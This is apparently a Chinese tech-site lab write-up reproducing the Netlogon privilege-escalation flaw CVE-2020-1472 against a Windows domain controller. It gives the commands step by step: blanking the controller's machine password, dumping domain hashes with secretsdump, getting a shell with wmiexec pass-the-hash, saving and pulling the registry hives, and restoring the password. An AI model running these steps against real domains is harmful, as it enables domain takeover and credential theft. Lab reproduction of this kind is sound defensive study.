千家信息网

Netlogon特权提升漏洞CVE 2020-1472该如何复习

发表于:2024-11-23 作者:千家信息网编辑
千家信息网最后更新 2024年11月23日,Netlogon特权提升漏洞CVE 2020-1472该如何复习,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。1.复现环
千家信息网最后更新 2024年11月23日Netlogon特权提升漏洞CVE 2020-1472该如何复习

Netlogon特权提升漏洞CVE 2020-1472该如何复习,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

1.复现环境

DC:
os:windows 2012 server
ip:192.168.236.132

攻击机:
os:kali
ip:192.168.236.130

2.影响版本

Windows Server 2008 R2 for x64-based SystemsService Pack 1Windows Server 2008 R2 for x64-basedSystems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)

3.域控环境搭建参考文章

sectool/251828.html

4.复现过程

4.1 漏洞验证

POC链接

4.2 漏洞利用

安装最新的Impacket,否则会报错

4.2.1 下载攻击exp

EXP下载

4.2.2 置空密码

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

4.2.3 获取hash

进入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

4.2.4 获取shell

python3 wmiexec.py -hashes  DOMAIN/administrator\@IP

4.2.5 获取原hash

reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.saveexit

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢复hash

恢复链接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR 

4.2.8 验证是否恢复

使用获取hash的命令来验证是否恢复

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

5.修复建议

官方修复建议

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。

0